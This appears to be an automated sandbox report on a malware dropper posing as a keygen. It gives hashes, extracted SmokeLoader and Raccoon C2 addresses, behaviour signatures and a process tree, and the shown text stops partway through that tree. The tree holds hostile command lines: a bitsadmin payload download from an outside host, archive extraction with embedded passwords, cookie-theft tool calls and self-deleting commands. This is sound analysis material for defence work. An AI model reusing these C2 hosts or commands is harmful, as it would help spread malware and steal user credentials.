Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1753s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    04-05-2021 10:11

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 59 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 26 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 43 IoCs
  • Modifies data under HKEY_USERS 32 IoCs
  • Modifies registry class 40 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: MapViewOfSection 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:460
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:880
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:840
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {85318584-151C-4F13-A6D3-B2D08A1612BD} S-1-5-18:NT AUTHORITY\System:Service:
            3⤵
              PID:2312
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                4⤵
                • Executes dropped EXE
                PID:2224
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                4⤵
                • Executes dropped EXE
                PID:2768
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                4⤵
                • Executes dropped EXE
                PID:2636
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                4⤵
                • Executes dropped EXE
                PID:2772
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                4⤵
                • Executes dropped EXE
                PID:5180
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                4⤵
                • Executes dropped EXE
                PID:5172
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {D4563559-3A6D-47F1-91D7-C3F122970736} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
              3⤵
                PID:2440
                • C:\Users\Admin\AppData\Roaming\jwavhue
                  C:\Users\Admin\AppData\Roaming\jwavhue
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:2168
                  • C:\Users\Admin\AppData\Roaming\jwavhue
                    C:\Users\Admin\AppData\Roaming\jwavhue
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:2328
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {10377EB6-14B5-4FF4-892D-5AEFDD51F0C1} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
                3⤵
                  PID:1572
                  • C:\Users\Admin\AppData\Roaming\jwavhue
                    C:\Users\Admin\AppData\Roaming\jwavhue
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:8020
                    • C:\Users\Admin\AppData\Roaming\jwavhue
                      C:\Users\Admin\AppData\Roaming\jwavhue
                      5⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:1356
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:1764
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:1832
              • C:\Windows\system32\msiexec.exe
                C:\Windows\system32\msiexec.exe /V
                2⤵
                • Enumerates connected drives
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:2872
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding F315D7B14ED9DBB25181155FDFFC17D0 C
                  3⤵
                  • Loads dropped DLL
                  PID:1112
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 9942A72751CFF196DB86E13CC2001BDC
                  3⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  PID:2180
                  • C:\Windows\SysWOW64\taskkill.exe
                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                    4⤵
                    • Kills process with taskkill
                    PID:1728
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 339BA82A20A31C2D38D036549A271246 M Global\MSI0000
                  3⤵
                  • Loads dropped DLL
                  PID:428
            • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
              "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
              1⤵
              • Loads dropped DLL
              • Checks whether UAC is enabled
              • Suspicious use of WriteProcessMemory
              PID:1200
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                2⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:1224
                • C:\Windows\SysWOW64\rundll32.exe
                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                  3⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1788
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1752
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1092
                • C:\Users\Admin\AppData\Local\Temp\is-1LMBC.tmp\Install.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-1LMBC.tmp\Install.tmp" /SL5="$30180,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1600
                  • C:\Users\Admin\AppData\Local\Temp\is-SMUQ6.tmp\Ultra.exe
                    "C:\Users\Admin\AppData\Local\Temp\is-SMUQ6.tmp\Ultra.exe" /S /UID=burnerch1
                    4⤵
                    • Drops file in Drivers directory
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Drops file in Program Files directory
                    • Modifies system certificate store
                    • Suspicious use of WriteProcessMemory
                    PID:1412
                    • C:\Program Files\Windows Mail\MPHNMKQIEB\ultramediaburner.exe
                      "C:\Program Files\Windows Mail\MPHNMKQIEB\ultramediaburner.exe" /VERYSILENT
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of WriteProcessMemory
                      PID:1528
                      • C:\Users\Admin\AppData\Local\Temp\is-IA9BE.tmp\ultramediaburner.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-IA9BE.tmp\ultramediaburner.tmp" /SL5="$10190,281924,62464,C:\Program Files\Windows Mail\MPHNMKQIEB\ultramediaburner.exe" /VERYSILENT
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of WriteProcessMemory
                        PID:1804
                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                          "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                          7⤵
                          • Executes dropped EXE
                          PID:1648
                    • C:\Users\Admin\AppData\Local\Temp\2d-7cc15-ce0-68588-0806788cb36b8\Tosurucabe.exe
                      "C:\Users\Admin\AppData\Local\Temp\2d-7cc15-ce0-68588-0806788cb36b8\Tosurucabe.exe"
                      5⤵
                      • Executes dropped EXE
                      PID:1328
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious behavior: GetForegroundWindowSpam
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SetWindowsHookEx
                        PID:688
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:688 CREDAT:275457 /prefetch:2
                          7⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of SetWindowsHookEx
                          PID:948
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:688 CREDAT:537612 /prefetch:2
                          7⤵
                          • Modifies Internet Explorer settings
                          • NTFS ADS
                          • Suspicious use of SetWindowsHookEx
                          PID:2716
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:688 CREDAT:275489 /prefetch:2
                          7⤵
                          • Modifies Internet Explorer settings
                          • Suspicious use of SetWindowsHookEx
                          PID:1064
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                        6⤵
                          PID:588
                      • C:\Users\Admin\AppData\Local\Temp\38-a6c1a-48b-c2e81-2a733645a6910\Qalalaelaela.exe
                        "C:\Users\Admin\AppData\Local\Temp\38-a6c1a-48b-c2e81-2a733645a6910\Qalalaelaela.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1984
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ot3mthz0.teh\sskiper.exe /s & exit
                          6⤵
                            PID:2592
                            • C:\Users\Admin\AppData\Local\Temp\ot3mthz0.teh\sskiper.exe
                              C:\Users\Admin\AppData\Local\Temp\ot3mthz0.teh\sskiper.exe /s
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:2684
                              • C:\Users\Admin\AppData\Local\Temp\605848541.exe
                                C:\Users\Admin\AppData\Local\Temp\605848541.exe
                                8⤵
                                • Executes dropped EXE
                                PID:2124
                              • C:\Users\Admin\AppData\Local\Temp\1530050709.exe
                                C:\Users\Admin\AppData\Local\Temp\1530050709.exe
                                8⤵
                                • Executes dropped EXE
                                PID:3300
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\ot3mthz0.teh\sskiper.exe & exit
                                8⤵
                                  PID:3428
                                  • C:\Windows\SysWOW64\PING.EXE
                                    ping 0
                                    9⤵
                                    • Runs ping.exe
                                    PID:3492
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ebwl1ea.zup\KiffMainE1.exe & exit
                              6⤵
                                PID:3012
                                • C:\Users\Admin\AppData\Local\Temp\2ebwl1ea.zup\KiffMainE1.exe
                                  C:\Users\Admin\AppData\Local\Temp\2ebwl1ea.zup\KiffMainE1.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3052
                                  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                    dw20.exe -x -s 532
                                    8⤵
                                    • Suspicious behavior: GetForegroundWindowSpam
                                    PID:1468
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z21ndb54.fft\001.exe & exit
                                6⤵
                                  PID:1344
                                  • C:\Users\Admin\AppData\Local\Temp\z21ndb54.fft\001.exe
                                    C:\Users\Admin\AppData\Local\Temp\z21ndb54.fft\001.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    PID:1764
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ia2on3jh.pd4\installer.exe /qn CAMPAIGN="654" & exit
                                  6⤵
                                    PID:2184
                                    • C:\Users\Admin\AppData\Local\Temp\ia2on3jh.pd4\installer.exe
                                      C:\Users\Admin\AppData\Local\Temp\ia2on3jh.pd4\installer.exe /qn CAMPAIGN="654"
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Enumerates connected drives
                                      • Modifies system certificate store
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      • Suspicious use of FindShellTrayWindow
                                      PID:2368
                                      • C:\Windows\SysWOW64\msiexec.exe
                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ia2on3jh.pd4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ia2on3jh.pd4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619863612 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                        8⤵
                                          PID:2624
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tfphoodx.jot\gpooe.exe & exit
                                      6⤵
                                        PID:2196
                                        • C:\Users\Admin\AppData\Local\Temp\tfphoodx.jot\gpooe.exe
                                          C:\Users\Admin\AppData\Local\Temp\tfphoodx.jot\gpooe.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:2988
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:1900
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:3356
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:3076
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            8⤵
                                            • Executes dropped EXE
                                            PID:1660
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qm2oogba.wkq\google-game.exe & exit
                                        6⤵
                                          PID:1368
                                          • C:\Users\Admin\AppData\Local\Temp\qm2oogba.wkq\google-game.exe
                                            C:\Users\Admin\AppData\Local\Temp\qm2oogba.wkq\google-game.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            • Suspicious use of SetWindowsHookEx
                                            PID:1536
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                              8⤵
                                                PID:2216
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bew1zk5k.12f\askinstall39.exe & exit
                                            6⤵
                                              PID:2176
                                              • C:\Users\Admin\AppData\Local\Temp\bew1zk5k.12f\askinstall39.exe
                                                C:\Users\Admin\AppData\Local\Temp\bew1zk5k.12f\askinstall39.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Modifies system certificate store
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                PID:2092
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  8⤵
                                                    PID:3132
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      9⤵
                                                      • Kills process with taskkill
                                                      PID:3164
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nditbt2d.gxw\setup.exe & exit
                                                6⤵
                                                  PID:2644
                                                  • C:\Users\Admin\AppData\Local\Temp\nditbt2d.gxw\setup.exe
                                                    C:\Users\Admin\AppData\Local\Temp\nditbt2d.gxw\setup.exe
                                                    7⤵
                                                      PID:2620
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\nditbt2d.gxw\setup.exe"
                                                        8⤵
                                                          PID:2292
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 1.1.1.1 -n 1 -w 3000
                                                            9⤵
                                                            • Runs ping.exe
                                                            PID:2980
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ipmhkaz1.vdh\SunLabsPlayer.exe /S & exit
                                                      6⤵
                                                        PID:2356
                                                        • C:\Users\Admin\AppData\Local\Temp\ipmhkaz1.vdh\SunLabsPlayer.exe
                                                          C:\Users\Admin\AppData\Local\Temp\ipmhkaz1.vdh\SunLabsPlayer.exe /S
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                          PID:1148
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:3184
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                              8⤵
                                                              • Drops file in Program Files directory
                                                              PID:592
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                              8⤵
                                                              • Drops file in Program Files directory
                                                              PID:3248
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:3456
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:2272
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Drops file in Program Files directory
                                                                  PID:3856
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Checks for any installed AV software in registry
                                                                  PID:3080
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                  8⤵
                                                                  • Download via BitsAdmin
                                                                  PID:3364
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3oiASrVz4Fp3yrG -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:392
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQ0lWHBfyfecMuF9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:8172
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:4340
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:7884
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:3756
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:1840
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:7808
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ZEhWHVROM\ZEhWHVROM.dll" ZEhWHVROM
                                                                            8⤵
                                                                              PID:8096
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ZEhWHVROM\ZEhWHVROM.dll" ZEhWHVROM
                                                                                9⤵
                                                                                  PID:1924
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                • Drops file in Program Files directory
                                                                                PID:7884
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:7788
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:7944
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nss3A44.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:8140
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
